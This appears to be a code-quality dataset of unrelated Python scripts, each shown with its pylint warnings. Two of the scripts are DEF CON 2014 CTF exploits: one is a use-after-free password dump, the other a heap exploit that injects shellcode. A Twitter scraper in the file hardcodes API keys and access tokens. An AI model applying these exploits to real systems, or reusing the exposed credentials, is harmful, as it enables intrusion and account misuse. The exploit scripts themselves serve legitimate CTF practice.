1 import tweepy 2 import csv 3 import pandas as pd 4 5 6 # keys and tokens from the Twitter Dev Console 7 consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh' 8 consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9' 9 access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg' 10 access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4' 11 12 #Twitter only allows access to a users most recent 3240 tweets with this method 13 14 #authorize twitter, initialize tweepy 15 auth = tweepy.OAuthHandler(consumer_key, consumer_secret) 16 auth.set_access_token(access_token, access_token_secret) 17 api = tweepy.API(auth) 18 19 #initialize a list to hold all the tweepy Tweets 20 alltweets = [] 21 22 #make initial request for most recent tweets (200 is the maximum allowed count) 23 new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended") 24 25 #save most recent tweets 26 alltweets.extend(new_tweets) 27 28 #save the id of the oldest tweet less one 29 # oldest = alltweets[-1].id - 1 30 #keep grabbing tweets until there are no tweets left to grab 31 while len(new_tweets) > 0: 32 # print "getting tweets before %s" % (oldest) 33 34 #all subsiquent requests use the max_id param to prevent duplicates 35 new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended") 36 37 #save most recent tweets 38 alltweets.extend(new_tweets) 39 40 #update the id of the oldest tweet less one 41 oldest = alltweets[-1].id - 1 42 43 # print "...%s tweets downloaded so far" % (len(alltweets)) 44 45 #transform the tweepy tweets into a 2D array that will populate the csv 46 outtweets = [[tweet.id_str, tweet.created_at, tweet.full_tweet.encode("utf-8"), tweet.retweet_count, tweet.favorite_count] for tweet in alltweets] 47 48 #write the csv 49 with open('tweets.csv', 'w+') as f: 50 writer = csv.writer(f) 51 writer.writerow(["id","created_at","full_text","retweet_count","favorite_count"]) 52 writer.writerows(outtweets) 53
50 - warning: bad-indentation 51 - warning: bad-indentation 52 - warning: bad-indentation 49 - warning: unspecified-encoding 3 - warning: unused-import
1 from test import mining 2 tag = "#WednesdayWisdom" 3 limit = "10" 4 sen_list = mining(tag,int(limit)) 5 print(sen_list)
1 - error: no-name-in-module
1 #!/usr/bin/env python 2 3 import socket 4 from struct import pack, unpack 5 6 DEBUG = False 7 8 server = "shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me" 9 server = "127.0.0.1" 10 port = 31337 11 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 s.connect((server, port)) 13 s.settimeout(30) 14 15 def recv_until(s, pattern): 16 ret = '' 17 while True: 18 c = s.recv(1) 19 if c == '': 20 raise Exception("Connection closed") 21 ret += c 22 if ret.find(pattern) != -1: 23 break 24 return ret 25 26 # trigger use-after-free by creating 2 items and then removing them in order 27 print recv_until(s, "$ ") 28 print "set 1 abcd" 29 s.send("set 1 abcd\n") 30 print recv_until(s, "$ ") 31 print "set 2 abcd" 32 s.send("set 2 abcd\n") 33 print recv_until(s, "$ ") 34 print "set 1" 35 s.send("set 1\n") 36 print recv_until(s, "$ ") 37 print "set 2" 38 s.send("set 2\n") 39 print recv_until(s, "$ ") 40 41 42 print "show <pointers>" 43 # set use-after-free item via strdup of argument to 'show' command 44 # first two items are the key,value pair followed by blink and flink 45 # use a pointer to the string "password" in the code section for the key (0x80495d0) 46 # use the location of the password in bss for the value (0x804c3a0) 47 # use something to terminate the linked list for flink and blink 48 # - can't use null directly here since the strdup allocation would be cut short (must be 16 bytes to re-use the free'd block) 49 # - just use a pointer to some nulls in bss instead (0x804c390) 50 s.send("show " + pack("<IIII", 0x80495d0, 0x804C3A0, 0x804C390, 0x0804C390) + "\n") 51 print recv_until(s, "$ ") 52 53 # now, this will simply dump the password for us 54 print "show" 55 s.send("show\n") 56 a = recv_until(s, ': ') 57 pw = recv_until(s, '\n')[:-1] 58 b = recv_until(s, "$ ") 59 print a + pw + '\n' + b 60 61 print 'Enable password: "' + pw + '"' 62 63 print "enable " + pw 64 s.send('enable ' + pw + '\n') 65 66 print recv_until(s, "# ") 67 print "flag" 68 s.send('flag\n') 69 print recv_until(s, "# ") 70 print "quit" 71 s.send('quit\n')
27 - error: syntax-error
1 #!/usr/bin/env python 2 3 import socket, subprocess, sys 4 from struct import pack, unpack 5 6 global scenes 7 global officers 8 9 scenes = {} 10 officers = {} 11 12 remote = len(sys.argv) > 1 13 14 PORT = 8888 15 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 if remote: 17 HOST = "dosfun4u_5d712652e1d06a362f7fc6d12d66755b.2014.shallweplayaga.me" 18 else: 19 HOST = '127.0.0.1' 20 21 def chksum(data): 22 ret = 0 23 for d in data: 24 ret += ord(d) 25 return ret & 0xffff 26 27 def add_officer(officer_id, status=0, x=0, y=0): 28 global officers 29 print 'update' if officers.has_key(officer_id) and officers[officer_id] else 'add', 'officer', hex(officer_id) 30 officers[officer_id] = True 31 payload = pack('H', 0x7d0) 32 payload += pack('H', officer_id) 33 payload += pack('H', status) 34 payload += pack('H', x) 35 payload += pack('H', y) 36 payload += pack('H', 0x0) 37 return payload 38 39 def remove_officer(officer_id): 40 global officers 41 print 'remove officer', hex(officer_id), 'should work' if officers.has_key(officer_id) and officers[officer_id] else 'should fail' 42 officers[officer_id] = False 43 payload = pack('H', 0xbb8) 44 payload += pack('H', officer_id) 45 return payload 46 47 def add_scene(scene_id, data2, data3, inline_data='', x=0, y=0): 48 global scenes 49 print 'update' if scenes.has_key(scene_id) and scenes[scene_id] else 'add', 'scene', hex(scene_id) 50 scenes[scene_id] = True 51 size1 = len(inline_data)/2 52 size2 = len(data2) 53 size3 = len(data3) 54 payload = pack('H', 0xfa0) 55 payload += pack('H', scene_id) 56 payload += pack('H', x) 57 payload += pack('H', y) 58 payload += pack('B', size1) 59 payload += pack('B', size2) 60 payload += pack('H', size3) 61 payload += pack('H', 0) 62 payload += inline_data[:size1*2] 63 payload += data2 64 payload += data3 65 return payload 66 67 def recv_all(s, size): 68 ret = [] 69 received = 0 70 while size > received: 71 c = s.recv(size-received) 72 if c == '': 73 raise Exception('Connection closed') 74 ret.append(c) 75 received += len(c) 76 return ''.join(ret) 77 78 def recv_until(s, pattern): 79 ret = '' 80 while True: 81 c = s.recv(1) 82 if c == '': 83 raise Exception("Connection closed") 84 ret += c 85 if ret.find(pattern) != -1: 86 break 87 return ret 88 89 s.connect((HOST, PORT)) 90 91 if remote: 92 print s.recv(4096) 93 buf = s.recv(4096) 94 print buf 95 data = buf.split(' ')[0] 96 print 'challenge = {}'.format(data) 97 print 'hashcatting...' 98 p = subprocess.Popen(['./hashcat', data], stdout=subprocess.PIPE); 99 result = p.communicate()[0].strip('\n\r\t ') 100 print 'response = {}'.format(result) 101 s.send(result) 102 103 def send_cmd(s,payload,recvLen=0): 104 payload += pack('H', chksum(payload)) 105 s.send(payload) 106 return recv_all(s, recvLen) 107 108 shellcode = open('shellcode', 'rb').read() 109 110 print 'Getting block into free-list' 111 send_cmd(s,add_officer(1),5) 112 send_cmd(s,remove_officer(1),5) 113 print 'Adding officer to reuse block from free-list' 114 send_cmd(s,add_officer(0xc),5) 115 print 'Writing shellcode to 008f:0000' 116 send_cmd(s,add_scene(1, pack("<HHHHHH", 0xc, 0, 0x4688, 0x8f, 0, 0), shellcode),5) 117 print 'Modifying officer structure to include pointer to fake officer on stack' 118 send_cmd(s,add_scene(2, pack("<HHHHHH", 1, 0, 0, 0, 0x47aa, 0x011f), "lolololol"),5) 119 print 'Writing return to shellcode on stack' 120 send_cmd(s,add_officer(0x945, 0x1d26, 0x10, 0x97),5) 121 122 print 'Receiving response...' 123 print 'Key 1:', recv_until(s,'\n').replace('\x00', '')[:-1] 124 print 'Key 2:', recv_until(s,'\n')[:-1]
29 - error: syntax-error
1 import tkinter as tk 2 from tkinter import filedialog 3 from tkinter import * 4 from PIL import Image, ImageTk 5 import numpy 6 from keras.models import load_model 7 model = load_model('BienBao.h5') 8 class_name = { 9 1:'Speed limit (20km/h)', 10 2:'Speed limit (30km/h)', 11 3:'Speed limit (50km/h)', 12 4:'Speed limit (60km/h)', 13 5:'Speed limit (70km/h)', 14 6:'Speed limit (80km/h)', 15 7:'End of speed limit (80km/h)', 16 8:'Speed limit (100km/h)', 17 9:'Speed limit (120km/h)', 18 10:'No passing', 19 11:'No passing veh over 3.5 tons', 20 12:'Right-of-way at intersection', 21 13:'Priority road', 22 14:'Yield', 23 15:'Stop', 24 16:'No vehicles', 25 17:'Veh > 3.5 tons prohibited', 26 18:'No entry', 27 19:'General caution', 28 20:'Dangerous curve left', 29 21:'Dangerous curve right', 30 22:'Double curve', 31 23:'Bumpy road', 32 24:'Slippery road', 33 25:'Road narrows on the right', 34 26:'Road work', 35 27:'Traffic signals', 36 28:'Pedestrians', 37 29:'Children crossing', 38 30:'Bicycles crossing', 39 31:'Beware of ice/snow', 40 32:'Wild animals crossing', 41 33:'End speed + passing limits', 42 34:'Turn right ahead', 43 35:'Turn left ahead', 44 36:'Ahead only', 45 37:'Go straight or right', 46 38:'Go straight or left', 47 39:'Keep right', 48 40:'Keep left', 49 41:'Roundabout mandatory', 50 42:'End of no passing', 51 43:'End no passing veh > 3.5 tons' 52 } 53 54 top=tk.Tk() 55 top.geometry('800x600') 56 top.title('Phan loai bien bao giao thong') 57 top.configure(background='#CDCDCD') 58 label = Label(top, background = '#CDCDCD', font=('arial',15,'bold')) 59 label.place(x=0, y=0, relwidth = 1, relheight = 1) 60 61 sign_image = Label(top) 62 def classify(file_path): 63 global label_packed 64 image = Image.open(file_path) 65 image = image.resize((30, 30)) 66 image = numpy.expand_dims(image, axis=0) 67 image = numpy.array(image) 68 print(image.shape) 69 pred = model.predict_classes([image])[0] 70 sign = class_name[pred+1] 71 print(sign) 72 label.configure(foreground = '#011638', text = sign) 73 74 75 def show_classify_button(file_path): 76 classify_button = Button(top,text='Phan loai', command = lambda : classify(file_path), padx=10, pady=5) 77 classify_button.configure(background='GREEN', foreground = 'white', font = ('arial', 10, 'bold')) 78 classify_button.place(relx = 0.79, rely = 0.46) 79 80 def upload_image(): 81 try: 82 file_path = filedialog.askopenfilename() 83 uploaded = Image.open(file_path) 84 uploaded.thumbnail(((top.winfo_width()/2.25), 85 (top.winfo_height()/2.25))) 86 im = ImageTk.PhotoImage(uploaded) 87 sign_image.configure(image= im) 88 sign_image.image = im 89 label.configure(text='') 90 show_classify_button(file_path) 91 except: 92 pass 93 94 upload = Button(top, text='Upload an image', command=upload_image, padx = 10, pady = 5) 95 upload.configure(background='#364156', foreground = 'white', font = ('arial', 10, 'bold')) 96 97 upload.pack(side = BOTTOM, pady = 50) 98 sign_image.pack(side=BOTTOM, expand = True) 99 label.pack(side = BOTTOM, expand = True) 100 heading = Label(top, text = 'Bien bao giao thong cua ban', pady = 20, font = ('arial', 20, 'bold')) 101 heading.configure(background = '#CDCDCD', foreground = '#364156') 102 heading.pack() 103 top.mainloop()
3 - warning: wildcard-import 63 - warning: global-variable-not-assigned 91 - warning: bare-except 3 - warning: unused-wildcard-import
1 def switch(on_strike): 2 players = {1,2} 3 return list(players.difference(set([on_strike])))[0] 4 5 6 def get_player(previous_score, previous_player, previous_bowl_number): 7 if previous_score%2 == 0 and (previous_bowl_number%6 !=0 or previous_bowl_number ==0): 8 player = previous_player 9 elif previous_score%2 != 0 and previous_bowl_number % 6 == 0: 10 player = previous_player 11 else: 12 player = switch(previous_player) 13 return player 14 15 16 17 a = [1, 2, 0, 0, 4, 1, 6, 2, 1, 3] 18 player_turns = [] 19 player_score_chart = {1:0, 2:0} 20 total_score = 0 21 22 previous_score=0 23 previous_player=1 24 previous_bowl_number=0 25 26 for runs in a: 27 player_turns.append(get_player(previous_score, previous_player, previous_bowl_number)) 28 previous_bowl_number+=1 29 previous_score=runs 30 previous_player=player_turns[-1] 31 player_score_chart[previous_player] += previous_score 32 total_score += previous_score 33 34 print 'Total Score : ', total_score 35 print 'Batsman 1 Score : ', player_score_chart[1] 36 print 'Batsman 2 Score : ', player_score_chart[2]
34 - error: syntax-error
1 n=int(input("enter the numbers u want to print:")) 2 for i in range(1,n+1): 3 if(i%3==0): 4 print ('Fizz') 5 continue 6 elif(i%5==0): 7 print ('Buzz') 8 continue 9 print i 10 11
9 - error: syntax-error
1 arr=[1,2,3,5,8,4,7,9,1,4,12,5,6,5,2,1,0,8,1] 2 a = [None] * len(arr); 3 visited = 0; 4 for i in range(0, len(arr)): 5 count = 1; 6 for j in range(i+1, len(arr)): 7 if(arr[i] == arr[j]): 8 count = count + 1; 9 a[j] = visited; 10 if(a[i] != visited): 11 a[i] = count; 12 for i in range(0, len(a)): 13 if(a[i] != visited): 14 print(" "+ str(arr[i]) +" has occured "+ str(a[i])+" times");
2 - warning: unnecessary-semicolon 3 - warning: unnecessary-semicolon 5 - warning: unnecessary-semicolon 8 - warning: unnecessary-semicolon 9 - warning: unnecessary-semicolon 11 - warning: unnecessary-semicolon 14 - warning: unnecessary-semicolon
1 def returnSum(dict): 2 sum=0 3 for i in dict: 4 sum=sum+dict[i] 5 return sum 6 dict={'Rick':85,'Amit':42,'George':53,'Tanya':60,'Linda':35} 7 print 'sum:', returnSum(dict)
7 - error: syntax-error
1 # represent the "board" in code 2 3 # dependencies 4 import random 5 6 class Board: 7 def __init__(self, width=10): 8 self.width = width 9 self.height = width * 2 10 11 self.WALL_CHANCE = .25 12 self.FLOOR_CHANCE = .15 13 14 # create the grid 15 self.create_random_grid() 16 17 def create_random_grid(self): 18 # reset old grid 19 self.grid = [] 20 21 # generate cells for new grid 22 for i in range(self.width * self.height): 23 # is the cell at the left, right, top, or bottom? 24 is_left = True if i % self.width == 0 else False 25 is_right = True if i % self.width == self.width-1 else False 26 is_top = True if i < self.width else False 27 is_bottom = True if i > (self.width * self.height - self.width) else False 28 29 # create the cell 30 cell = { 31 "left" : is_left, 32 "right" : is_right, 33 "roof" : is_top, 34 "floor" : is_bottom, 35 "ID" : i 36 } 37 38 # append to grid 39 self.grid.append(cell) 40 41 # randomly generate walls 42 total = self.width * self.height 43 horizontal_amount = int(total * self.FLOOR_CHANCE) 44 verticle_amount = int(total * self.WALL_CHANCE) 45 46 # generate the walls 47 for _i in range(verticle_amount): 48 random_index = random.randrange(0, total) 49 50 adding_num = -1 if random_index == total - 1 else 1 51 first = "right" if adding_num == 1 else "left" 52 second = "right" if first == "left" else "left" 53 54 self.grid[random_index][first] = True 55 self.grid[random_index + adding_num][second] = True 56 57 # generate the floors 58 for _i in range(horizontal_amount): 59 random_index = random.randrange(0, total) 60 61 adding_num = self.width * -1 if random_index > (total - self.width) else self.width 62 first = "floor" if adding_num == self.width else "roof" 63 second = "floor" if first == "roof" else "roof" 64 65 self.grid[random_index][first] = True 66 self.grid[random_index + adding_num - 1][second] = True 67 68 69 def can_move_from(self, cell_index): 70 # TODO this works but its a lot of repeated code. Can it be made better? 71 72 # can you move left 73 can_move_left = False 74 is_left = True if cell_index % self.width == 0 else False 75 if not is_left and self.grid[cell_index]["left"] == False: 76 left_cell = self.grid[cell_index - 1] 77 is_wall_left = True if left_cell["right"] == True else False 78 can_move_left = True if not is_wall_left else False 79 80 # can you move right 81 can_move_right = False 82 is_right = True if cell_index % self.width == self.width-1 else False 83 if not is_right and self.grid[cell_index]["right"] == False: 84 right_cell = self.grid[cell_index + 1] 85 is_wall_right = True if right_cell["left"] == True else False 86 can_move_right = True if not is_wall_right else False 87 88 # can you move up 89 can_move_up = False 90 is_top = True if cell_index < self.width else False 91 if not is_top and self.grid[cell_index]["roof"] == False: 92 top_cell = self.grid[cell_index - self.width] 93 is_wall_top = True if top_cell["floor"] == True else False 94 can_move_up = True if not is_wall_top else False 95 96 # can you move down 97 can_move_down = False 98 is_bottom = True if cell_index > (self.width * self.height - self.width) else False 99 if not is_bottom and self.grid[cell_index]["floor"] == False: 100 bottom_cell = self.grid[cell_index + self.width] 101 is_wall_bottom = True if bottom_cell["roof"] == True else False 102 can_move_down = True if not is_wall_bottom else False 103 104 # return the results 105 return can_move_left, can_move_right, can_move_up, can_move_down 106 107 def BFS(self): 108 """breadth first search to find the quickest way to the bottom""" 109 start_i = random.randrange(0,self.width) 110 paths = [ [start_i] ] 111 solved = False 112 dead_ends = [] 113 114 while not solved: 115 for path in paths: 116 # find all possibles moves from path 117 if len(dead_ends) >= len(paths) or len(paths) > 10000: # TODO this solution sucks 118 return False, False 119 120 # NOTE order is left right up down 121 if path[-1] >= (self.width * self.height - self.width): 122 solved = True 123 return paths, paths.index(path) 124 125 possible_moves = self.can_move_from(path[-1]) 126 127 if True in possible_moves: 128 move_order = [-1, 1, (self.width) * -1, self.width] 129 first_append_flag = False 130 origonal_path = path.copy() 131 for i in range(4): 132 possible_move = possible_moves[i] 133 if possible_move: 134 move = move_order[i] 135 136 next_index = origonal_path[-1] + move 137 if not next_index in origonal_path: 138 139 if not first_append_flag: 140 path.append(next_index) 141 first_append_flag = True 142 else: 143 new_path = origonal_path.copy() 144 new_path.append(next_index) 145 paths.append(new_path) 146 if not first_append_flag: 147 dead_ends.append(paths.index(path)) 148 else: 149 dead_ends.append(paths.index(path)) 150 151 152 153 def pretty_print_BFS(self, path): 154 for i in range(self.width * self.height): 155 cell = self.grid[i] 156 in_path = True if cell["ID"] in path else False 157 158 number_str = str(i) 159 160 if len(number_str) == 1: 161 number_str += " " 162 elif len(number_str) == 2: 163 number_str += " " 164 165 end_str = "\n" if i % self.width == self.width-1 else " " 166 167 if in_path: 168 print('\033[92m' + number_str + '\033[0m', end=end_str) 169 else: 170 print(number_str, end=end_str) 171 print(path) 172 173 174 175 176 if __name__ == "__main__": 177 b = Board(10) 178 179 paths, index = b.BFS() 180 181 if paths and index: 182 b.pretty_print_BFS(paths[index]) 183 else: 184 print('ljfdsakfdl') 185 186 # can_move_left, can_move_right, can_move_up, can_move_down = b.can_move_from(0) 187 188 # print("can_move_left ", can_move_left) 189 # print("can_move_right ", can_move_right) 190 # print("can_move_up ", can_move_up) 191 # print("can_move_down ", can_move_down)
70 - warning: fixme 117 - warning: fixme 24 - refactor: simplifiable-if-expression 25 - refactor: simplifiable-if-expression 26 - refactor: simplifiable-if-expression 27 - refactor: simplifiable-if-expression 69 - refactor: too-many-locals 74 - refactor: simplifiable-if-expression 77 - refactor: simplifiable-if-expression 78 - refactor: simplifiable-if-expression 82 - refactor: simplifiable-if-expression 85 - refactor: simplifiable-if-expression 86 - refactor: simplifiable-if-expression 90 - refactor: simplifiable-if-expression 93 - refactor: simplifiable-if-expression 94 - refactor: simplifiable-if-expression 98 - refactor: simplifiable-if-expression 101 - refactor: simplifiable-if-expression 102 - refactor: simplifiable-if-expression 110 - warning: redefined-outer-name 145 - warning: modified-iterating-list 114 - refactor: too-many-nested-blocks 107 - refactor: inconsistent-return-statements 156 - refactor: simplifiable-if-expression
1 # use pygame to show the board on a window 2 3 # dependencies 4 import pygame, random 5 6 class Window: 7 def __init__(self, board): 8 # init py game 9 pygame.init() 10 11 # width height 12 self.WIDTH = 600 13 self.HEIGHT = 600 14 15 # diffenet display modes 16 self.display_one = False 17 self.display_all = False 18 19 # place holder 20 self.solution = [] 21 self.display_all_c = 0 22 23 # the board to display on the window 24 self.board = board 25 26 # define the dimensions of the cells of the board 27 self.cell_width = self.WIDTH // self.board.width 28 29 # define the left padding for the grid 30 total_width = self.cell_width * self.board.width 31 self.left_padding = (self.WIDTH - total_width) // 2 32 33 34 # colors 35 self.COLORS = { 36 "BLACK" : (255, 255, 255), 37 "GREY" : (230, 230, 230), 38 "BLUE" : (0, 0, 255), 39 "RED" : (255, 0, 0), 40 "YELLOW" : (212, 175, 55) 41 } 42 43 def create_random_color(self): 44 return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)) 45 46 def create_window(self): 47 # define window 48 self.WIN = pygame.display.set_mode( (self.WIDTH, self.HEIGHT) ) 49 50 # name window 51 pygame.display.set_caption("LIGHT NING") 52 53 # logo/icon for window 54 logo = pygame.image.load("images/logo.png") 55 pygame.display.set_icon(logo) 56 57 def get_BFS(self): 58 solved = False 59 while not solved: 60 self.board.create_random_grid() 61 paths, index = self.board.BFS() 62 63 if paths != False and index != False: 64 self.solution = paths[index] 65 solved = True 66 67 self.paths = paths 68 self.solution_i = index 69 70 def draw_grid_solution(self): 71 fflag = True 72 for i in range(self.board.width * self.board.height): 73 if not i in self.solution: continue 74 75 # might not work 76 col_num = i % self.board.width 77 row_num = i // self.board.width 78 79 x_pos = self.left_padding + (col_num * self.cell_width) 80 y_pos = row_num * self.cell_width 81 82 # define rect 83 r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width) 84 85 # draw the rectangle 86 pygame.draw.rect(self.WIN, self.COLORS["YELLOW"], r) 87 88 def draw_BFS(self): 89 if self.display_all_c >= len(self.paths): 90 self.display_all_c = 0 91 92 # generate a color for each path 93 path_colors = [] 94 for path in self.paths: 95 path_colors.append(self.create_random_color()) 96 path_colors[-1] = (0, 0 ,0) 97 98 temp = self.paths.pop(self.display_all_c) 99 self.paths.append(temp) 100 101 for path in self.paths: 102 for i in path: 103 # might not work 104 col_num = i % self.board.width 105 row_num = i // self.board.width 106 107 x_pos = self.left_padding + (col_num * self.cell_width) 108 y_pos = row_num * self.cell_width 109 110 # define rect 111 r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width) 112 113 # draw the rectangle 114 pygame.draw.rect(self.WIN, path_colors[self.paths.index(path)], r) 115 116 self.display_all_c += 1 117 118 119 def draw_window(self): 120 self.WIN.fill(self.COLORS["GREY"]) 121 122 if self.display_one: 123 self.draw_grid_solution() 124 elif self.display_all: 125 self.draw_BFS() 126 127 pygame.display.update() 128 129 def main(self): 130 # create window 131 self.create_window() 132 133 self.running = True 134 while self.running: 135 for event in pygame.event.get(): 136 if event.type == pygame.QUIT: 137 self.running = False 138 139 elif event.type == pygame.KEYDOWN: 140 if event.key == pygame.K_0: 141 self.get_BFS() 142 elif event.key == pygame.K_1: 143 # toggle display one 144 self.display_one = not self.display_one 145 if self.display_one: 146 self.display_all = False 147 elif event.key == pygame.K_2: 148 # toggle display all 149 self.display_all = not self.display_all 150 if self.display_all: 151 self.display_all_c = 0 152 self.display_one = False 153 154 self.draw_window() 155 156 if __name__ == "__main__": 157 win = Window() 158 159 win.main()
6 - refactor: too-many-instance-attributes 71 - warning: unused-variable 48 - warning: attribute-defined-outside-init 67 - warning: attribute-defined-outside-init 68 - warning: attribute-defined-outside-init 133 - warning: attribute-defined-outside-init 137 - warning: attribute-defined-outside-init 157 - error: no-value-for-parameter
1 # this could and will be better i just needed to make it here as a 2 # proof of concept but it will be online and better later 3 4 import os, sys 5 6 BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # adds project dir to places it looks for the modules 7 sys.path.append(BASE_PATH) 8 9 from lib.board import Board 10 from lib.window import Window 11 12 b = Board() 13 win = Window(b) 14 15 win.main()
Clean Code: No Issues Detected
1 from flask import Flask, render_template, request, jsonify 2 from flask_cors import CORS 3 import json 4 import numpy as np 5 6 app = Flask(__name__) 7 CORS(app) 8 9 10 @app.route('/transpose', methods=["POST"]) 11 def homepage(): 12 data = request.json 13 result = None 14 error = "" 15 try: 16 mat = data["matrix"] 17 mat = np.array(mat) 18 result = mat.T.tolist() 19 error = "" 20 except KeyError as e: 21 error = "Key %s not found" % (str(e)) 22 pass 23 except Exception as e: 24 error = str(e) 25 pass 26 return jsonify({"result": result, "error": error}) 27 28 29 app.run()
23 - warning: broad-exception-caught 22 - warning: unnecessary-pass 25 - warning: unnecessary-pass 1 - warning: unused-import 3 - warning: unused-import
1 from tkinter import * 2 from tkinter import ttk 3 from tkinter import filedialog 4 import test_python3 5 6 class Root(Tk): 7 def __init__(self): 8 super(Root, self).__init__() 9 self.title("Malware Detection") 10 self.minsize(500, 300) 11 12 self.labelFrame = ttk.LabelFrame(self, text = " Open File") 13 self.labelFrame.grid(column = 0, row = 1, padx = 200, pady = 20) 14 15 self.button() 16 17 18 19 def button(self): 20 self.button = ttk.Button(self.labelFrame, text = "Browse A File",command = self.fileDialog) 21 self.button.grid(column = 1, row = 1) 22 23 24 def fileDialog(self): 25 26 self.filename = filedialog.askopenfilename(initialdir = "/", title = "Select A File") 27 self.label = ttk.Label(self.labelFrame, text = "") 28 self.label.grid(column = 1, row = 2) 29 self.label.configure(text = self.filename) 30 31 32 33 34 root = Root() 35 root.mainloop()
1 - warning: wildcard-import 8 - refactor: super-with-arguments 15 - error: not-callable 19 - error: method-hidden 26 - warning: attribute-defined-outside-init 27 - warning: attribute-defined-outside-init 4 - warning: unused-import 1 - warning: unused-wildcard-import
1 from .resnext101 import ResNeXt101
1 - error: relative-beyond-top-level 1 - warning: unused-import
1 from .resnet import ResNet, BasicBlock, Bottleneck 2 import torch 3 from torch import nn 4 from .config import resnet50_path 5 6 model_urls = { 7 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth', 8 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth', 9 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', 10 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', 11 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth', 12 } 13 14 class ResNet50(nn.Module): 15 def __init__(self): 16 super(ResNet50, self).__init__() 17 net = ResNet(last_stride=2, 18 block=Bottleneck, frozen_stages=False, 19 layers=[3, 4, 6, 3]) 20 net.load_param(resnet50_path) 21 22 self.layer0 = net.layer0 23 self.layer1 = net.layer1 24 self.layer2 = net.layer2 25 self.layer3 = net.layer3 26 self.layer4 = net.layer4 27 28 def forward(self, x): 29 layer0 = self.layer0(x) 30 layer1 = self.layer1(layer0) 31 layer2 = self.layer2(layer1) 32 layer3 = self.layer3(layer2) 33 layer4 = self.layer4(layer3) 34 return layer4 35 36 def load_param(self, trained_path): 37 param_dict = torch.load(trained_path) 38 for i in param_dict: 39 if 'classifier' in i or 'arcface' in i: 40 continue 41 self.state_dict()[i].copy_(param_dict[i]) 42 print('Loading pretrained model from {}'.format(trained_path)) 43 44 45 class ResNet50_BIN(nn.Module): 46 def __init__(self): 47 super(ResNet50_BIN, self).__init__() 48 net = ResNet(last_stride=2, 49 block=IN_Bottleneck, frozen_stages=False, 50 layers=[3, 4, 6, 3]) 51 net.load_param(resnet50_path) 52 53 self.layer0 = net.layer0 54 self.layer1 = net.layer1 55 self.layer2 = net.layer2 56 self.layer3 = net.layer3 57 self.layer4 = net.layer4 58 59 def forward(self, x): 60 layer0 = self.layer0(x) 61 layer1 = self.layer1(layer0) 62 layer2 = self.layer2(layer1) 63 layer3 = self.layer3(layer2) 64 layer4 = self.layer4(layer3) 65 return layer4 66 67 def load_param(self, trained_path): 68 param_dict = torch.load(trained_path) 69 for i in param_dict: 70 if 'classifier' in i or 'arcface' in i: 71 continue 72 self.state_dict()[i].copy_(param_dict[i]) 73 print('Loading pretrained model from {}'.format(trained_path)) 74 75 76 class ResNet50_LowIN(nn.Module): 77 def __init__(self): 78 super(ResNet50_LowIN, self).__init__() 79 net = ResNet_LowIN(last_stride=2, 80 block=Bottleneck, frozen_stages=False, 81 layers=[3, 4, 6, 3]) 82 net.load_param(resnet50_path) 83 84 self.layer0 = net.layer0 85 self.layer1 = net.layer1 86 self.layer2 = net.layer2 87 self.layer3 = net.layer3 88 self.layer4 = net.layer4 89 90 def forward(self, x): 91 layer0 = self.layer0(x) 92 layer1 = self.layer1(layer0) 93 layer2 = self.layer2(layer1) 94 layer3 = self.layer3(layer2) 95 layer4 = self.layer4(layer3) 96 return layer4 97 98 def load_param(self, trained_path): 99 param_dict = torch.load(trained_path) 100 for i in param_dict: 101 if 'classifier' in i or 'arcface' in i: 102 continue 103 self.state_dict()[i].copy_(param_dict[i]) 104 print('Loading pretrained model from {}'.format(trained_path))
1 - error: relative-beyond-top-level 4 - error: relative-beyond-top-level 16 - refactor: super-with-arguments 47 - refactor: super-with-arguments 49 - error: undefined-variable 78 - refactor: super-with-arguments 79 - error: undefined-variable 1 - warning: unused-import
1 resnet50_path = './resnet/resnet50-19c8e357.pth'
Clean Code: No Issues Detected
1 from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
1 - error: relative-beyond-top-level 1 - warning: unused-import 1 - warning: unused-import 1 - warning: unused-import
1 import datetime 2 import os 3 import time 4 5 import torch 6 from torch import nn 7 from torch import optim 8 from torch.autograd import Variable 9 from torch.utils.data import DataLoader 10 from torchvision import transforms 11 import pandas as pd 12 import numpy as np 13 14 import joint_transforms 15 from config import msra10k_path, MTDD_train_path 16 from datasets import ImageFolder_joint 17 from misc import AvgMeter, check_mkdir, cal_sc 18 from model import R3Net, SDCNet 19 from torch.backends import cudnn 20 21 cudnn.benchmark = True 22 23 torch.manual_seed(2021) 24 torch.cuda.set_device(6) 25 26 csv_path = './label_DUTS-TR.csv' 27 ckpt_path = './ckpt' 28 exp_name ='SDCNet' 29 30 args = { 31 'iter_num': 30000, 32 'train_batch_size': 16, 33 'last_iter': 0, 34 'lr': 1e-3, 35 'lr_decay': 0.9, 36 'weight_decay': 5e-4, 37 'momentum': 0.9, 38 'snapshot': '' 39 } 40 41 joint_transform = joint_transforms.Compose([ 42 joint_transforms.RandomCrop(300), 43 joint_transforms.RandomHorizontallyFlip(), 44 joint_transforms.RandomRotate(10) 45 ]) 46 img_transform = transforms.Compose([ 47 transforms.ToTensor(), 48 transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) 49 ]) 50 target_transform = transforms.ToTensor() 51 to_pil = transforms.ToPILImage() 52 53 all_data = pd.read_csv(csv_path) 54 train_set = ImageFolder_joint(all_data, joint_transform, img_transform, target_transform) 55 train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], 